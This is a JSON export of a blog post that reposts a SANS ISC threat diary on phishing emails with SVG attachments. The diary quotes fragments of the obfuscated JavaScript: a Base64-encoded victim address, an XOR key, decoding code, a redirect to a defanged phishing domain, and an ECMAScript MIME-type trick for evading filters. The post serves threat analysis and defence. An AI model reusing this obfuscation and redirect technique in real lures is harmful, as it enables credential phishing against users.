{"id":3441,"date":"2026-06-02T08:04:01","date_gmt":"2026-06-02T08:04:01","guid":{"rendered":"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/"},"modified":"2026-06-02T08:04:01","modified_gmt":"2026-06-02T08:04:01","slug":"new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd","status":"publish","type":"post","link":"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/","title":{"rendered":"New Wave Of Phishing Emails with SVG Files, (Tue, Jun 2nd)"},"content":{"rendered":"
\n

For a few days, my SANS ISC mailbox is flooded with emails that delivers SVG files. An SVG (“Scalable Vector Graphic”) is a web-friendly vector file format used for graphics and icons. No URL in the body, just \u201can image\u201d, that\u2019s the perfect way to deliver some\u00a0malicious content. This isn\u2019t the first time that we see this technique used by threat actors[1<\/a>].<\/p>\n

This time, the SVG\u00a0files are really simple and even don\u2019t contain any graphical element but a simple piece of JavaScript that will redirect the victim’s browser to the phishing page:<\/p>\n

\"\"<\/p>\n

With the current wave, I just detected regular phishing pages but it could be any payload.<\/p>\n

The variable \u201cnl\u201d contains the targeted email address:<\/p>\n

\nnl = '$aGFuZGxlcnNAc2Fucy5lZHU='; \/\/ \u201chandlers@sans.edu\u201d<\/pre>\n
The interesting payload is in \u201coa\u201d, it contains a Base64-encode and XOR\u2019d string. The XOR key is in \u201cbd\u201d:<\/p>\n
\nconst pt = \"b19208caeefa\";\nconst rm = \"51d1e7dcd384\";\nconst bd = pt + rm;<\/pre>\n
The payload is decoded here:<\/p>\n
\nconst cx = ['b', 'style', 'o', 't', 'a'];\nconst kf = self[[cx[4], cx[3], cx[2], cx[0]].join('')];\nconst ts = kf(oa);\nconst rabbit = Uint8Array.from(ts, (aa, ak) =>\n    aa.charCodeAt(0) ^ bd.charCodeAt(ak % bd.length)\n);<\/pre>\n
Finally, the variable \u201crabbit\u201d is used to perform the redirect in the browser:<\/p>\n
\nwindow.location.href = \"hxxps:\/\/chinougoo[.]cfd\/W74rH61S!x7sbhhS0bKPv\/\" + \"handlers@sans.edu\";<\/pre>\n
This technique works because SVG files are handled by the browser by default on the Windows operating system. Note the TLD used (“.cfd”) which means “Clothing, Fashion, and Design”. It’s a cheap TLD more and more abused in phishing campaigns[2<\/a>].\u00a0<\/p>\n
A final note about the MIME type used in the SVG file:\u00a0<\/p>\n
\n<script type=\"application\/ecmascript\"><\/pre>\n
This is a official MIME type for ECMAScript, the standardized\u00a0specification underlying JavaScript (standard ECMA-262)[3<\/a>]. This has been used probably to defeat some common security controls that are looking for “JavaScript”.<\/p>\n
[1] https:\/\/isc.sans.edu\/diary\/Increase+In+Phishing+SVG+Attachments\/31456<\/a>
\n[2]\u00a0https:\/\/radar.cloudflare.com\/tlds\/cfd?dateRange=7d<\/a>
\n[3]\u00a0https:\/\/github.com\/sudheerj\/ECMAScript-features<\/a><\/p>\n
Xavier Mertens (@xme)
\nXameco
\nSenior ISC Handler – Freelance Cyber Security Consultant
\nPGP Key<\/a><\/p>\n
 (c) SANS Internet Storm Center. https:\/\/isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.<\/p><\/div>\n","protected":false},"excerpt":{"rendered":"
For a few days, my SANS ISC mailbox is flooded with emails that delivers SVG files. An SVG (“Scalable Vector Graphic”) is a web-friendly vector file format used for graphics and icons. No URL in the body, just \u201can image\u201d, that\u2019s the perfect way to deliver some\u00a0malicious content. This isn\u2019t the first time that we […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[90],"tags":[91],"class_list":["post-3441","post","type-post","status-publish","format-standard","hentry","category-cybersecurity","tag-cybersecurity"],"yoast_head":"\nNew Wave Of Phishing Emails with SVG Files, (Tue, Jun 2nd) - Imperative Business Ventures Limited<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"New Wave Of Phishing Emails with SVG Files, (Tue, Jun 2nd) - Imperative Business Ventures Limited\" \/>\n<meta property=\"og:description\" content=\"For a few days, my SANS ISC mailbox is flooded with emails that delivers SVG files. An SVG (“Scalable Vector Graphic”) is a web-friendly vector file format used for graphics and icons. No URL in the body, just \u201can image\u201d, that\u2019s the perfect way to deliver some\u00a0malicious content. This isn\u2019t the first time that we […]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/\" \/>\n<meta property=\"og:site_name\" content=\"Imperative Business Ventures Limited\" \/>\n<meta property=\"article:published_time\" content=\"2026-06-02T08:04:01+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260602-1.png\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"headline\":\"New Wave Of Phishing Emails with SVG Files, (Tue, Jun 2nd)\",\"datePublished\":\"2026-06-02T08:04:01+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/\"},\"wordCount\":308,\"image\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260602-1.png\",\"keywords\":[\"Cybersecurity\"],\"articleSection\":[\"Cybersecurity\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/\",\"url\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/\",\"name\":\"New Wave Of Phishing Emails with SVG Files, (Tue, Jun 2nd) - Imperative Business Ventures Limited\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260602-1.png\",\"datePublished\":\"2026-06-02T08:04:01+00:00\",\"author\":{\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"breadcrumb\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/#primaryimage\",\"url\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260602-1.png\",\"contentUrl\":\"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260602-1.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/blog.ibvl.in\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"New Wave Of Phishing Emails with SVG Files, (Tue, Jun 2nd)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/blog.ibvl.in\/#website\",\"url\":\"https:\/\/blog.ibvl.in\/\",\"name\":\"Imperative Business Ventures Limited\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/blog.ibvl.in\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\/\/blog.ibvl.in\"],\"url\":\"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"New Wave Of Phishing Emails with SVG Files, (Tue, Jun 2nd) - Imperative Business Ventures Limited","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/","og_locale":"en_US","og_type":"article","og_title":"New Wave Of Phishing Emails with SVG Files, (Tue, Jun 2nd) - Imperative Business Ventures Limited","og_description":"For a few days, my SANS ISC mailbox is flooded with emails that delivers SVG files. An SVG (“Scalable Vector Graphic”) is a web-friendly vector file format used for graphics and icons. No URL in the body, just \u201can image\u201d, that\u2019s the perfect way to deliver some\u00a0malicious content. This isn\u2019t the first time that we […]","og_url":"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/","og_site_name":"Imperative Business Ventures Limited","article_published_time":"2026-06-02T08:04:01+00:00","og_image":[{"url":"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260602-1.png","type":"","width":"","height":""}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/#article","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/"},"author":{"name":"admin","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"headline":"New Wave Of Phishing Emails with SVG Files, (Tue, Jun 2nd)","datePublished":"2026-06-02T08:04:01+00:00","mainEntityOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/"},"wordCount":308,"image":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/#primaryimage"},"thumbnailUrl":"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260602-1.png","keywords":["Cybersecurity"],"articleSection":["Cybersecurity"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/","url":"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/","name":"New Wave Of Phishing Emails with SVG Files, (Tue, Jun 2nd) - Imperative Business Ventures Limited","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/#website"},"primaryImageOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/#primaryimage"},"image":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/#primaryimage"},"thumbnailUrl":"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260602-1.png","datePublished":"2026-06-02T08:04:01+00:00","author":{"@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"breadcrumb":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/#primaryimage","url":"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260602-1.png","contentUrl":"https:\/\/isc.sans.edu\/diaryimages\/images\/isc-20260602-1.png"},{"@type":"BreadcrumbList","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/06\/02\/new-wave-of-phishing-emails-with-svg-files-tue-jun-2nd\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/blog.ibvl.in\/"},{"@type":"ListItem","position":2,"name":"New Wave Of Phishing Emails with SVG Files, (Tue, Jun 2nd)"}]},{"@type":"WebSite","@id":"https:\/\/blog.ibvl.in\/#website","url":"https:\/\/blog.ibvl.in\/","name":"Imperative Business Ventures Limited","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/blog.ibvl.in\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/blog.ibvl.in"],"url":"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/"}]}},"_links":{"self":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/3441","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/comments?post=3441"}],"version-history":[{"count":0,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/3441\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/media?parent=3441"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/categories?post=3441"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/tags?post=3441"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}